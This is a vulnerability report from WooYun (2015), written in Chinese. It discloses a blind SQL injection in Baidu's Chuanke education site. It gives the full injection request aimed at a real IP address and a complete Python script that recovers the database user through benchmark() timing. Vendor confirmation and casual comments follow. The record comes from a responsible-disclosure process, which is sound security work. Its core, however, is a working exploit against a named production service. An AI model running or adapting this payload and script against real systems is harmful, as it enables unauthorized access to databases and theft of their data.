缺陷编号:WooYun-2015-0129572
漏洞标题:百度传课网一处MySQL注射(附验证脚本)
相关厂商:百度
漏洞作者:lijiejie
提交时间:2015-07-27 07:59
公开时间:2015-09-10 11:04
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
Tags标签:
2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开
百度传课网一处MySQL注射(附验证脚本)
注入点:
1 2 3 4 5 6 7 8 9 10 |
POST /?act=custom&do=loadModule&mod=school HTTP/1.1<br> Content-Length: 347<br> Content-Type: application/x-www-form-urlencoded<br> X-Requested-With: XMLHttpRequest<br> Referer: http://123.125.112.93<br> Host: 123.125.112.93<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4<br> Accept: */*mid=5&setting%5Bcategory%5D=(benchmark(4000000*(length(user())=17),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279 |
参数setting[category]和setting[sortlist]可注入。
用benchmark保险一些,不会将db server打挂了。猜解user(),得到:
1 |
[Done] MySQL user is [email protected] |
python脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#encoding=utf-8<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',<br> 'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())<br> user = ''for i in range(1, 18):<br> for payload in payloads:<br> s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))<br> s = "mid=5&setting%5Bcategory%5D=(benchmark(4000000*(" + s + "),md5(123)))&setting%5Bcolumn%5D=3&setting%5Bdisplay%5D=true&setting%5Blimit%5D=6&setting%5Bposition%5D=right&setting%5Bsort%5D=2&setting%5Btitle%5D=%E8%AF%BE%E7%A8%8B%E5%88%97%E8%A1%A8&sid=1826279"<br> conn = httplib.HTTPConnection('123.125.112.93', timeout=30)<br> conn.request(method='POST', url='/?act=custom&do=loadModule&mod=school', body=s, headers=headers)<br> start_time = time.time()<br> html_doc = conn.getresponse().read()<br> conn.close()<br> print '.',<br> if time.time() - start_time > 1.0:<br> user += payload<br> print '\n[in progress]', user,<br> breakprint '\n[Done] MySQL user is %s' % user |
参数过滤
危害等级:高
漏洞Rank:15
确认时间:2015-07-2711:03
感谢提交
暂无
2个...这回小龙虾免费了!2333333
@lijiejie
前排失败 = =
@子非海绵宝宝 那么小能满足你吗? 要大的.
lijiejie
吃完百度外卖的小龙虾,就开始搞百度了。。。 @lijiejie
@子非海绵宝宝 百度请我吃小龙虾,哈哈 🙂
原文连接
的情况下转载,若非则不得使用我方内容。